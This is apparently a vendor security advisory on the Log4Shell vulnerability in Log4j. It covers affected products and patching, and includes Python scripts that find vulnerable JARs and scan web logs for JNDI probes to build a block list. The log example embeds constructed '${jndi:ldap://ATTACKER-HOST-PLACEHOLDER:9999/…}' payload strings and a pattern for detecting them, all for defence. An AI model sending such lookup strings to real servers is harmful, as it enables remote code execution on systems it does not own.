Overview
On December 10th, 2021, CVE-2021-44228 (Log4Shell) was publicly released, affecting the Log4j Java logging framework. This vulnerability received the highest possible CVSS score of 10 out of 10. Three other Log4j-related vulnerabilities have been released since then, but the original is by far the most critical. It was initially discovered by Chen Zhaojun of Alibaba’s security team on November 24th, 2021 and was then privately disclosed to Apache. The risk of this vulnerability is so severe that, as a precautionary measure, Canada shut down 4,000 government sites. Since the public release there have been reports of millions of attempts to exploit the vulnerability across the world, but as of January 10th, CISA stated it had not seen any significant intrusions related to Log4j.
So, what is Log4j, what makes it so vulnerable, and how do you exploit it?
Log4j is a piece of software, perhaps surprisingly developed and maintained by a group of volunteers, that is written in Java and logs the activity of users on computers. An example of activity that is captured and logged would be navigating to a broken link on a web page and receiving a 404 error. Log4j is also used for diagnostic messages in software, such as the amount of memory being used and the commands a user entered. Logging this information isn’t the issue; the problem is that the code actively interprets the activity it is logging, which means remote code can be executed. Within Log4j there is a feature, the Java Naming and Directory Interface (JNDI) lookup, that allows commands wrapped in ${…} to be run. This feature performs live lookups both inside and outside of your network. With the correct sequence of input, it can be used to place malware on the server and gain full remote code execution on the host. An example input would reach out to an attacking machine’s IP on port 9999 and download the malware file being hosted there.
Products affected
At this time, it’s almost safe to assume that all products are affected, as Log4j has been found deeply embedded in so many pieces of software, including some whose vendors were not aware of its presence. Popular affected products include Minecraft, Apple’s iCloud, AWS and the NSA’s reverse engineering tool Ghidra, and the list goes on. CISA continues to update its GitHub repository with a list of products known to be affected.
Detection & Patching
To discover what systems to patch, here are a few steps to take:
- Identify any internet-facing assets.
- Use authenticated vulnerability scanning to detect devices that have been impacted.
- If you have an endpoint detection and response (EDR) system, use it to search for Log4j files.
- Determine the version of Log4j being used. Versions 2.0 through 2.14.1 are vulnerable.
- Update to the current version, 2.17.1.
- Repeat the above steps on internal IT and OT systems.
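The version check in the steps above is the part that is easy to get wrong by hand, because Log4j is often buried inside other archives. The script below is an added example for this advisory (it is not nGuard’s tooling and not the CISA scanner linked further down): it walks a directory tree, opens every JAR and any JAR nested one level inside it, reads Implementation-Version from META-INF/MANIFEST.MF (falling back to the log4j-core-X.Y.Z.jar filename), notes whether the JndiLookup class is present, and classifies the version against the advisory’s ranges (2.0 through 2.14.1 vulnerable, 2.17.1 current; anything in between is labelled as needing the update). The sample JAR tree it builds is constructed so the scan can be run offline.

```python
"""Locate Log4j 2 JARs on disk and flag versions that need updating.

Added example for this advisory (not nGuard's tooling). Sample JARs are
constructed in a temporary directory; point scan_for_log4j() at a real path
to inspect a host.
"""
import io
import re
import zipfile
from pathlib import Path

# Class that implements the ${jndi:...} lookup. It still ships in patched
# releases, so its presence alone does not mean "vulnerable"; the version does.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_NAME_RE = re.compile(r"log4j-core-(\d[\w.\-]*)\.jar$")
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")
UPDATE_TARGET = (2, 17, 1)  # version the advisory says to update to


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparsable."""
    m = VERSION_RE.match(text or "")
    return tuple(int(g) if g else 0 for g in m.groups()) if m else None


def classify(version):
    """Map a version string onto the advisory's ranges."""
    v = parse_version(version)
    if v is None:
        return "unknown"
    if v < (2, 0, 0):
        return "not-log4j2"          # 1.x is outside CVE-2021-44228's range
    if v <= (2, 14, 1):
        return "vulnerable"
    if v < UPDATE_TARGET:
        return "update-recommended"  # later Log4j fixes land in 2.17.1
    return "current"


def manifest_version(zf):
    """Implementation-Version from the JAR manifest, if present."""
    try:
        text = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in text.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def inspect_jar(zf, label, depth=0):
    """Findings for one open JAR; recurses one level into nested JARs."""
    findings = []
    names = set(zf.namelist())
    name_match = CORE_NAME_RE.search(label)
    if JNDI_LOOKUP in names or name_match:
        version = manifest_version(zf) or (name_match.group(1) if name_match else None)
        findings.append({
            "location": label,
            "version": version,
            "jndi_lookup_present": JNDI_LOOKUP in names,
            "status": classify(version),
        })
    if depth < 1:  # fat JARs (e.g. BOOT-INF/lib/*.jar) hide Log4j one level down
        for inner in sorted(n for n in names if n.endswith(".jar")):
            with zipfile.ZipFile(io.BytesIO(zf.read(inner))) as nested:
                findings.extend(inspect_jar(nested, f"{label}!{inner}", depth + 1))
    return findings


def scan_for_log4j(root):
    """Walk `root` and inspect every *.jar; unreadable archives are skipped."""
    findings = []
    for jar in sorted(Path(root).rglob("*.jar")):
        try:
            with zipfile.ZipFile(jar) as zf:
                findings.extend(inspect_jar(zf, str(jar)))
        except zipfile.BadZipFile:
            continue
    return findings


def _make_jar(target, version, with_jndi, extra=None):
    """Write a minimal constructed JAR: manifest plus optional placeholder class."""
    with zipfile.ZipFile(target, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if with_jndi:
            zf.writestr(JNDI_LOOKUP, b"placeholder, not real bytecode")
        for name, data in (extra or {}).items():
            zf.writestr(name, data)


def build_sample_tree(root):
    """Constructed layout: a vulnerable core JAR, a current one, and a fat JAR."""
    lib = Path(root) / "lib"
    lib.mkdir(parents=True, exist_ok=True)
    _make_jar(lib / "log4j-core-2.14.1.jar", "2.14.1", True)
    _make_jar(lib / "log4j-core-2.17.1.jar", "2.17.1", True)
    nested = io.BytesIO()
    _make_jar(nested, "2.14.1", True)
    _make_jar(Path(root) / "app.jar", "1.0.0", False,
              {"BOOT-INF/lib/log4j-core-2.14.1.jar": nested.getvalue()})


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for f in scan_for_log4j(tmp):
            print(f"{f['status']:<20} {str(f['version']):<8} {f['location']}")
```

Running it prints three findings: the nested copy inside app.jar and the stand-alone 2.14.1 JAR as vulnerable, and the 2.17.1 JAR as current even though it still carries JndiLookup.class. That last case is the caveat to keep in mind when reading EDR file-search results: matching on the class name alone over-reports, so always pair it with the version.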
To prevent Log4j from being exploited, there are a few steps to take.
- Search logs for IPs known to be scanning for the vulnerability and add them to your block list. A running list of known IPs can be found here.
- Block the list of IPs that have been used to host malicious payloads exploiting the vulnerability.
- Review the list of IOCs being updated by Microsoft.
- Review the additional list of IOCs being updated by the Curated Intelligence Trust Group.
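Searching logs for scanning sources, as the first step above suggests, comes down to two things: spotting requests that carry a ${…} lookup aimed at JNDI (in the query string, a header, or URL-encoded), and comparing the client IPs against a published scanner list. The script below is an added example for this advisory, not nGuard’s tooling; the access log lines, the KNOWN_SCANNERS set and the ATTACKER-HOST-PLACEHOLDER host inside them are all constructed. It decodes each line, flags lines whose ${…} body names jndi:, splits the source IPs into known scanners and new candidates worth reviewing, and renders the result as ipset-style create/add lines for a block list.

```python
"""Triage web access logs for ${jndi:...} lookup probes and build a block list.

Added example for this advisory (not nGuard's tooling). Everything below the
imports that looks like data is constructed for the demonstration.
"""
import ipaddress
import re
from urllib.parse import unquote

# Constructed Apache-style access log. Lines 1, 2 and 4 carry a lookup string
# (query string, User-Agent, and URL-encoded query); line 5 mentions "jndi"
# innocently and must not be flagged.
CONSTRUCTED_LOG = """\
203.0.113.10 - - [11/Dec/2021:03:14:07 +0000] "GET /?x=${jndi:ldap://ATTACKER-HOST-PLACEHOLDER:9999/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Dec/2021:03:15:22 +0000] "GET /login HTTP/1.1" 200 1043 "-" "${jndi:ldap://ATTACKER-HOST-PLACEHOLDER:9999/b}"
192.0.2.44 - - [11/Dec/2021:03:16:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.45 - - [11/Dec/2021:03:17:45 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2FATTACKER-HOST-PLACEHOLDER%3A9999%2Fc%7D HTTP/1.1" 404 312 "-" "curl/7.79"
198.51.100.7 - - [11/Dec/2021:03:18:00 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Constructed stand-in for a published list of scanning sources.
KNOWN_SCANNERS = {"203.0.113.10", "203.0.113.99"}

CLIENT_IP_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s")


def normalize(line):
    """Undo URL encoding (twice, to cover double-encoding) and lower-case."""
    return unquote(unquote(line)).lower()


def is_jndi_probe(line):
    """True when the line carries a ${...} expression whose body names jndi:.

    Braces are stripped before the search so a lookup wrapped inside other
    ${...} expressions is still caught; requiring a literal "${" keeps plain
    mentions of the word (documentation URLs, for instance) out of the results.
    """
    text = normalize(line)
    if "${" not in text:
        return False
    return "jndi:" in text.replace("${", "").replace("}", "")


def client_ip(line):
    """Leading client address of a common/combined-format access log line."""
    m = CLIENT_IP_RE.match(line)
    return m.group(1) if m else None


def triage(lines, known_scanners):
    """Split probing sources into known scanners and new candidates to review."""
    probe_ips = {ip for ip in (client_ip(l) for l in lines if is_jndi_probe(l)) if ip}
    return {
        "probe_ips": probe_ips,
        "known_hits": probe_ips & set(known_scanners),
        "new_candidates": probe_ips - set(known_scanners),
    }


def render_blocklist(ips, setname="log4shell-block"):
    """ipset-style lines: create the set, then one add per source address."""
    lines = [f"create {setname} hash:ip"]
    lines += [f"add {setname} {ip}" for ip in sorted(ips, key=ipaddress.ip_address)]
    return "\n".join(lines)


if __name__ == "__main__":
    result = triage(CONSTRUCTED_LOG.splitlines(), KNOWN_SCANNERS)
    print("known scanners seen:  ", sorted(result["known_hits"]))
    print("new sources to review:", sorted(result["new_candidates"]))
    print(render_blocklist(result["probe_ips"]))
```

On the constructed log this reports 203.0.113.10 as a known scanner and 198.51.100.7 and 192.0.2.45 as new sources, while the jndi-tutorial request from 198.51.100.7 on its own would not have been flagged. Treat the new-candidate set as a review queue rather than an automatic block: the same IP can be a scanner one minute and a legitimate client the next, which is why the advisory points at a running list that is kept up to date rather than a one-off export.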
Additional links
Many articles and resources have been published since the release of this vulnerability, so in addition to the links in this Security Advisory, nGuard wanted to provide a few additional ones for further reading.
- If you want to try exploiting the vulnerability yourself, John Hammond and TryHackMe have created a room for you to do so. https://tryhackme.com/room/solar
- A growing list of Tenable Nessus plugins being released for detection of Log4j. https://community.tenable.com/s/article/Plugins-associated-with-CVE-2021-44228-Log4Shell
- The team at Huntress has had great coverage and updates, including an open-source tool to help detect the vulnerability. https://log4shell.huntress.com/
- The National Cyber Security Centrum (NCSC-NL) has been maintaining another GitHub repository with a list of information for hunting, IOCs, detection and mitigation, scanning, and vulnerable software. https://github.com/NCSC-NL/log4shell
- CISA released an open-source Log4j scanner. https://github.com/cisagov/log4j-scanner
If you need assistance with the detection of vulnerable Log4j instances, have discovered a Log4j-related incident, or need general security services related to this vulnerability or anything else, reach out to nGuard. nGuard offers Log4j scanning, consulting services, log management and event collection, and penetration testing services.